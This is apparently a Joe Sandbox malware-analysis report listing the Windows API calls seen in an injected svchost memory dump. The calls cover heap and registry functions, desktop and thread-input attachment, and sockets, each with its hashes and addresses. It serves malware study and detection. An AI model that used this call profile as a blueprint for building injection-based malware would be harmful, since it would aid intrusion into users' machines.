                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1800058468-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowRect.USER32(02BBCD24,00000000), ref: 02BBCBFF
                                                                                                                                                                                                                • GetWindowLongA.USER32(02BBCD24,000000F0), ref: 02BBCC19
                                                                                                                                                                                                                • GetScrollBarInfo.USER32(02BBCD24,000000FA,?), ref: 02BBCC34
                                                                                                                                                                                                                • GetScrollBarInfo.USER32(02BBCD24,000000FB,0000003C), ref: 02BBCC61
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoScrollWindow$LongRect
                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                • API String ID: 4167475372-4251816714
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: freemalloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3061335427-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,02BD5097,00000000,756934D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC41FE
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4205
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4215
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,756934D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4229
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4230
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,02BD4081,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC424A
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4251
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Validatememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3638075499-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BD4980: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7742FFB0,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49AD
                                                                                                                                                                                                                  • Part of subcall function 02BD4980: GetProcessTimes.KERNEL32(00000000,?,?,?,02BC7967,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49CA
                                                                                                                                                                                                                  • Part of subcall function 02BD4980: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49E2
                                                                                                                                                                                                                  • Part of subcall function 02BD4980: CloseHandle.KERNEL32(00000000,?,?,?,?,?,02BC7967,00000000), ref: 02BD49F3
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB80,000002E8,00000000,00000000,029567E8,02BC7AD4), ref: 02BC7828
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7844
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,029567E8), ref: 02BC7869
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC786C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,029567E8), ref: 02BC7879
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC787C
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7887
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3901171168-0
                                                                                                                                                                                                                • Opcode ID: e288b62a1a507104368b3b65163e0ca4f186b9611979c7099517430063572fc6
                                                                                                                                                                                                                • Instruction ID: 2bcc8de3f8500a2d5a786017364e93b4a93ad66ae90753b004e779cce3e3b6f9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e288b62a1a507104368b3b65163e0ca4f186b9611979c7099517430063572fc6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47018872E41310ABD7705FA69858F66BB5CEFCCBA27618459E34593240CB306451CFE0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                                • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                                • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BC43D9
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC440C
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC4438
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC445F
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02BC44DD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                • Opcode ID: a3e84739b8957e163c6b4e3be38dcbe00c349002ed6f11198ba62350cb7505bb
                                                                                                                                                                                                                • Instruction ID: e498500eb31186ac90adcd9cc44349e6c848dbfceec546d5ba50816649e74060
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3e84739b8957e163c6b4e3be38dcbe00c349002ed6f11198ba62350cb7505bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C410D70D00218AFDB50DFA8D884AEEBBF5EF48704F64856EE955E7240E774AA408F91
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BCAACC
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BCAAF1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000012,?,?,?,?,?,02BC1A39), ref: 02BCAB71
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,02BC1A39), ref: 02BCAB78
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCAB88
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,02BC1A39), ref: 02BCAB9D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heapstrstr$AllocProcesslstrcpynmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2033102291-0
                                                                                                                                                                                                                • Opcode ID: aca02ebed7f4a9f801cec8c5c1a3f327a5eb19e40e7398e7197aa42f6acad68f
                                                                                                                                                                                                                • Instruction ID: d5037526b672daaf06a089df85ccf287c31813160e1a430b786f9aab625ff9f3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aca02ebed7f4a9f801cec8c5c1a3f327a5eb19e40e7398e7197aa42f6acad68f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12310B72A0021D5BD7324E289C84BBA7F9BDF41298F3986EDED85C7201D732DD058790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BC42A9
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC42DC
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC4308
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC432F
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02BC43AD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                • Opcode ID: 5d63829c8c9d32abf4589f097203a36c04b2be697cd74d6f5100b08175f12ab9
                                                                                                                                                                                                                • Instruction ID: 6101a8163dd7c8d5915ae90fbb4f736d62e8ac0f0f42ddfe30bbdcb0256a592e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d63829c8c9d32abf4589f097203a36c04b2be697cd74d6f5100b08175f12ab9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9541ED70D40218AFDB50DFA8D494AEEBBF5EF88704F64856EE515E7200E774AA408F91
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB13DE
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB141A
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB1446
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB146D
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02BB1498
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,02BC369B,00000000,00010108,?,00000000), ref: 02BD522F
                                                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02BD5264
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BD528E
                                                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(00000104,02BC369B), ref: 02BD52A6
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BD52B2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2377537114-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,02BC0AA8,000000FF,00000000,00000000,00000000,00000000,7556F380,?,?,02BC0AA8,?), ref: 02BCAA37
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013,00000000,?,02BC0AA8,?), ref: 02BCAA54
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BC0AA8,?), ref: 02BCAA5B
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCAA6B
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,02BC0AA8,000000FF,00000000,00000000,00000000,00000000,?,02BC0AA8,?), ref: 02BCAA88
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharHeapMultiWide$AllocProcessmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 913929354-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6C1A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6C21
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6C35
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6C4E
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02BB6C5C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3057210225-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000), ref: 02BBD242
                                                                                                                                                                                                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02BBD259
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BBD26F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BBD280
                                                                                                                                                                                                                • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02BBD297
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1270303404-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?,?,00000000,75573080,?,02BB922C,?,00000006,00000000), ref: 02BBE38C
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02BBE3A3
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02BBE3A6
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000006,?,02BB922C), ref: 02BBE3BD
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 02BBE3C2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3855296974-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBD2BC
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BBD2C4
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02BBD2D0
                                                                                                                                                                                                                • SendMessageA.USER32(?,0000000D,?,?), ref: 02BBD2E1
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02BBD2ED
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2643679612-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBE34A
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BBE352
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02BB9F24,?,?,?,?,02BB9400,?,?), ref: 02BBE364
                                                                                                                                                                                                                • GetFocus.USER32 ref: 02BBE366
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02BB9F24,?,?,?,?,02BB9400,?,?), ref: 02BBE373
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 968181190-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02BE13F9
                                                                                                                                                                                                                • realloc.MSVCRT ref: 02BE1405
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02BE14AC
                                                                                                                                                                                                                • realloc.MSVCRT ref: 02BE14B8
                                                                                                                                                                                                                  • Part of subcall function 02BE0EA0: __WSAFDIsSet.WS2_32(?,?), ref: 02BE0F50
                                                                                                                                                                                                                  • Part of subcall function 02BE0EA0: closesocket.WS2_32(?), ref: 02BE0F6D
